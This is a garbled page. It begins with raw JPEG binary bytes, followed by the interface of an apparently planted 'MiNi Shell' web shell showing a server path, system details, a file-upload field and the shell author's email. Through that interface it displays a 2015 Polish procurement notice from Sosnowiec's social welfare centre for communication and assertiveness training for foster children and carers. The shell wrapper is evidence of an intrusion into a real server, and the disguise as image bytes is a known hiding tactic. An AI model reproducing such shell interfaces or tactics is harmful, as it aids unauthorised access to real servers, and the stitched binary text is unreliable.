JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150306/49982-N-2015.html

<p class="kh_header"><b>Sosnowiec: Organizacja i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz                           ich opiekunów-rodziców zastępczych w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 49982 - 2015; data zamieszczenia: 06.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Sosnowcu , ul. 3 Maja 33, 41-200 Sosnowiec, woj. śląskie, tel. 32 2962201, faks 32 2962214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopssosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz                           ich opiekunów-rodziców zastępczych w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest realizacja usług obejmujących:                                      Organizację i przeprowadzenie szkolenia wyjazdowego oraz szkolenia stacjonarnego                     z zakresu komunikacji interpersonalnej dla niepełnoletnich wychowanków rodzin zastępczych oraz ich opiekunów/rodziców zastępczych w ramach projektu systemowego                                   Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII, Działania 7.1, Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.
2.Realizacja przedmiotu zamówienia została podzielona na dwa moduły: pierwszy wyjazdowy przewidziany w  jeden z weekendów IV lub V 2015r - wyjazd w piątek o godz.15.00 za wyjątkiem 03.04 br. i 01.05 br.; powrót w niedzielę o godz.19.00 oraz drugi warsztatowy przeprowadzony                w pierwszą sobotę następującą po wyjeździe weekendowym. Zakończenie realizacji całości zamówienia najpóźniej do 30.05.2015r.
     3. Liczba uczestników do 20 osób.

4.Usługa została podzielona na dwa moduły:
Moduł wyjazdowy 
	Moduł warsztatowy

4.1. Opis modułu pierwszego.
	Adresaci zadania
4.2.Adresatami zadania są osoby: niepełnoletnie - wychowankowie rodzin zastępczych, nieaktywne zawodowo - uczące się, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym oraz ich opiekunowie-rodzice zastępczy. 
Liczba uczestników do 20 osób.




	4.3.Miejsce realizacji zadania-moduł wyjazdowy.
	Wyjazd nastąpi w piątek o godz. 15.00 powrót w niedzielę o godz. 19.00. - 2 noclegi.
	Zadanie winno być zrealizowane w promieniu do 150 km od siedziby Zamawiającego,   
w miejscowości atrakcyjnej turystycznie.
	4.4.Szkolenie wyjazdowe: 
Dla 20 osób podzielonych na dwie - 10 osobowe grupy, z zastrzeżeniem, że opiekun                      i niepełnoletni wychowanek znajdują się w tej samej grupie, w dwóch odrębnych salach szkoleniowych Zajęcia powinny być prowadzone równocześnie w dwóch grupach.
Zajęcia - o charakterze warsztatowym, interaktywnym, prowadzone winny być przez psychologa w formie ćwiczeń indywidualnych i grupowych z zakresu komunikacji interpersonalnej i treningu asertywności - przewiduje się przeprowadzenie łącznie: 
15 godzin zegarowych:

 Pierwszy dzień tj. piątek: gry i zabawy integracyjne w tym ognisko                             z pieczeniem kiełbasek - łącznie 3 godziny zegarowe. Zajęcia powinny mieć na celu zbudowanie atmosfery zaufania, poczucia bezpieczeństwa            w grupie.
 Drugi dzień tj. sobota - warsztaty - łącznie 7 godzin zegarowych.                                   Zajęcia powinny prowadzić do nabycia konkretnych umiejętności komunikowania się w relacjach rodzinnych. 
zajęcia powinny być prowadzone od śniadania do obiadu np. od 9.00                 do 18.00 podczas zajęć należy uwzględnić przerwę obiadową 1 godzina oraz 2 przerwy kawowe po15 minut) i zawierać następującą tematykę:
-zwiększenie świadomości znaczenia komunikacji niewerbalnej                          w kontaktach z ludźmi, wyrażanie własnych uczuć, aktywne słuchanie, skuteczna i prosta komunikacja, unikanie błędów w komunikacji, 
-zwiększenie zdolności zrozumiałego prezentowania swoich opinii, przekonań, myśli, poprawa umiejętności nawiązywania i utrzymania pozytywnych relacji interpersonalnych, wzrost pewności siebie w sferze kontaktów interpersonalnych, poznanie własnych mocnych i słabych stron w zakresie komunikacji.
 integracja grupowa z wykorzystaniem atrakcji turystycznych danej miejscowości (z uwzględnieniem wieku i możliwości uczestników szkolenia) - zajęcia w terenie, odreagowanie napięcia emocjonalnego, wspólne wyjście do aqua parku, kręgielni, kina itp.
Trzeci dzień tj. niedziela - łącznie 5 godzin zegarowych np. od 9.00                         do 14.00. Zajęcia powinny zawierać: 
elementy treningu asertywności, sztuka mówienia (nie) bez poczucia winy, wyrażanie się poprzez komunikaty JA klucz długofalowego porozumienia, 
trening podstawowych zachowań asertywnych ,odgrywanie scenek odmawiania, stanowienia i obrony własnych granic oraz wyrażania próśb, asertywność w ciele, przekonujący język ciała, ćwiczenie postawy, głosu, gestów i mimiki.








5.Opis modułu drugiego:
Organizacja i prowadzenie zajęć warsztatowych:
5.1.	Adresaci zadania: 
Adresatami zadania są osoby: niepełnoletnie - wychowankowie rodzin zastępczych, nieaktywne zawodowo - uczące się, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym oraz ich opiekunowie/rodzice zastępczy. 
Liczba uczestników do 20 osób z zastrzeżeniem, iż w szkoleniu stacjonarnym udział mogą wziąć wyłącznie osoby, które wzięły udział w szkoleniu wyjazdowym.

5.2.	Szkolenie warsztatowe powinno obejmować:
5.2.1.	Przeprowadzenie zajęć warsztatowych, stacjonarnych z zakresu komunikacji interpersonalnej               i treningu asertywności. pogłębiających zdobytą wiedzę podczas szkolenia wyjazdowego -                            w 2 grupach 10 osobowych. 
5.2.2.	Dwie grupy będą jednocześnie uczestniczyć w zajęciach trwających 6 godzin dydaktycznych - 45 minutowych, w dwóch odrębnych salach szkoleniowych, z zastrzeżeniem, że opiekun                      i niepełnoletni wychowanek znajdują się w tej samej grupie.
5.3.	Miejsce i czas realizacji zadania:
5.3.1	Szkolenie powinno być zrealizowane na terenie miasta Sosnowca w promieniu maksymalnie do 2 km                 od centrum miasta. Jako punkt centrum Zamawiający przyjmuje dworzec główny PKP                     w Sosnowcu. W pierwszą sobotę następującą po wyjeździe weekendowym. Zamówienie powinno być zrealizowane w godzinach od 08.00 do 15.00. 
6.Wymagany termin zakończenia całości realizacji zadania 30.05.2015r.
Szczegółowy opis przedmiotu zamówienia w zakresie modułu pierwszego i drugiego zamieszczono w załączniku nr 1 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.51.10.00-9, 55.10.00.00-1, 63.00.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże,                       iż dysponuje lub będzie dysponował potencjałem technicznym tj:

Wykonawca dysponuje ośrodkiem, który będzie posiadał: 

a)	zaplecze socjalne i sanitarne przygotowane do przyjmowania grup szkoleniowych, 
b)	miejsce niezbędne do zorganizowania ogniska oraz gier i zabaw integracyjnych, 
c)	pokoje mieszkalne 2 osobowe z pełnym węzłem sanitarnym, wyposażone w jednoosobowe miejsca do spania, z dostępem do sieci WI-FI, telewizorem i radiem.




Wykonawca w zakresie modułu pierwszego wyjazdowego dysponuje lub będzie dysponował 2 salami, każda z nich jest/ma:
a)	wyposażona w odpowiednią liczbę miejsc siedzących i stolików,
b)	wyposażona w odpowiednie oprzyrządowania techniczne                         tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart z kompletem mazaków,
c)	przystosowana pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń,
d)	znajdująca się na terenie ośrodka, w którym będą zakwaterowani uczestnicy,
e)	nie będąca jednocześnie salą jadalną,
f)	posiada dostęp do źródeł prądu,
g)	 możliwość swobodnego przestawiania krzeseł i stołów,
h)	 optymalne warunki prowadzenia zajęć szkoleniowych w grupie               10 osobowej + trener, 
i)	odpowiednie oświetlenie: dostęp światła dziennego oraz całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
j)	miejsce na umieszczenie serwisu kawowego dla uczestników/uczestniczek szkoleń,
k)	odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia zajęć, 
l)	sala nie może znajdować się w piwnicy, suterenie lub poddaszu,
ł) w sali nie mogą znajdować się słupy, kolumny lub inne elementy, które utrudniają prowadzenie zajęć,
m)	ogrzewana przy spadku temperatury na zewnątrz poniżej 10 °C
n)	o powierzchni co najmniej 25 m2,

Wykonawca w zakresie modułu drugiego warsztatowego dysponuje 2 salami, każda z nich jest/ma:

a)	wyposażona w odpowiednią liczbę miejsc siedzących i stolików
b)	wyposażona w odpowiednie oprzyrządowania techniczne                         tj.: aparaturę audiowizualną, rzutnik, tablicę flipchart z kompletem mazaków,
c)	przystosowana pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń,
d)	na terenie Sosnowca w promieniu maksymalnie do 2 km od centrum miasta, przy czym za punkt orientacyjny w centrum miasta przyjmuje się dworzec główny PKP 
e)	posiada dostęp do źródeł prądu,
f)	możliwość swobodnego przestawiania krzeseł i stołów,
g)	optymalne warunki prowadzenia zajęć szkoleniowych w grupie                  10 osobowej + trener, 
h)	odpowiednie oświetlenie: dostęp światła dziennego oraz całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie,
i)	miejsce na umieszczenie serwisu kawowego dla uczestników/uczestniczek szkoleń,
j)	odpowiednie zabezpieczenie przed promieniowaniem słonecznym zapewniające komfort uczestnictwa i prowadzenia zajęć, 
k)	sala nie może znajdować się w piwnicy, suterenie lub poddaszu,
l)	w sali nie mogą znajdować się słupy, kolumny lub inne elementy, które utrudniają prowadzenie zajęć,
ł) ogrzewana przy spadku temperatury na zewnątrz poniżej 10 °C
m)	o powierzchni co najmniej 25 m2 
Formularz wykazu potencjału technicznego stanowi załącznik nr 8 do SIWZ.
	
Zamawiający dokona oceny spełnienia warunku na podstawie załączonego wykazu potencjału technicznego metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia                               w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj: 

Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował 2 trenerami z wykształceniem wyższym magisterskim, psychologicznym, którzy przeprowadzili co najmniej 4 szkolenia o tematyce treningi komunikacji interpersonalnej i treningi asertywności w okresie trzech lat przed dniem wszczęcia niniejszego postępowania.
Podane wymagania będzie spełniać każda ze wskazanych w wykazie osób i tylko osoby spełniające wymagania będą prowadzić zajęcia podczas szkolenia wyjazdowego i szkolenia stacjonarnego. 

Formularz wykazu stanowi załącznik nr 7 do SIWZ.
Zamawiający dokona oceny spełnienia warunku na podstawie załączonego wykazu osób metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
	Wykonawca podaje jako podstawę do dysponowania potencjałem technicznym np.: własność, umowa najmu, umowa użyczenia itp.; potencjałem osobowym np.: umowa               o pracę, umowa zlecenia, umowa o dzieło itp. Jeśli Wykonawca nie dysponuje potencjałem osobowym lub technicznym i będzie polegał na zasobach innych podmiotów wpisuje wówczas np. umowa przedwstępna lub umowa przyrzeczenia udostępnienia potencjału technicznego lub osobowego itp. i odpowiednio załącza do oferty pisemne zobowiązanie podmiotów, potwierdzające, iż oddają do dyspozycji potencjał techniczny lub osobowy na okres korzystania z nich przy wykonaniu zamówienia - Formularz załącznik    nr 9 i/lub 9.1 do SIWZ lub inny dokument w oryginale potwierdzający prawo                                do dysponowania potencjałem technicznym lub osobowym na czas wykonywania zamówienia.
Pełnomocnictwo wymagane w przypadku gdy do reprezentowania Wykonawcy upoważniona jest osoba inna niż wskazana w aktualnym odpisie z właściwego rejestru.
      Formularz pełnomocnictwa stanowi załącznik nr 6 do SIWZ</p><p><b>III.7)</b><p>
<p><b>ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne</b> - należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach </p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie trenerów - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się wprowadzania istotnych zmian w umowie z naruszeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych, z zastrzeżeniem ust. 4 niniejszego paragrafu.
4. Zamawiający przewiduje możliwość zmiany umowy w formie pisemnej pod rygorem nieważności tylko w sytuacji:
a) zmiany osób posiadających uprawnienia, odpowiednie kwalifikacje i doświadczenie do należytego wykonania zamówienia z zastrzeżeniem § 1 ust. 4 niniejszej umowy.                 Dopuszcza się możliwość zmian personalnych odnośnie osób stanowiących kadrę, o której mowa w ust. 3, po uzyskaniu zgody Zamawiającego. Wykonawca zobowiązany jest zwrócić się do Zamawiającego z pisemnym wnioskiem o wyrażenie zgody na taką zmianę załączając                   do niego informację potwierdzającą posiadanie uprawnień, kwalifikacji oraz doświadczenia osób - zastępców zgodnych z wymaganiami Zamawiającego określonymi w załączniku nr 6    do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.sosnowiec.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać w Dziale Zamówień Publicznych i Administracji 
ul. 3 Maja 33 Sosnowiec, piętro I pok. 224..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2015 godzina 11:30, miejsce: Kancelaria ul. 3 Maja 33 Sosnowiec, pokój 115 parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ                                         Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PRIORYTETU VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.1. PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com